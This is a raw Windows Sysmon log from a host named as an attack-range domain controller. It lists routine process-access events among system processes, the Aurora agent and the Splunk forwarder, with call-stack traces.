10341000x800000000000000042866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.432{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.432{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000042864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.344{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2CCF6187057126E173FF799321A40B6,SHA256=EDBF8F8F39A66EF6289A9FDD907AD9CAC9D1681ED095714603BFEB904A0D4D1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.152{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005396C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000042862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.152{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006012C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000042861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.152{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006012C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000042860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.152{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006012C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000042859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.135{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.135{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f997|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1279f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16992|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000042854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-DDF7-63C7-B404-00000000AF02}27284392C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.104{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 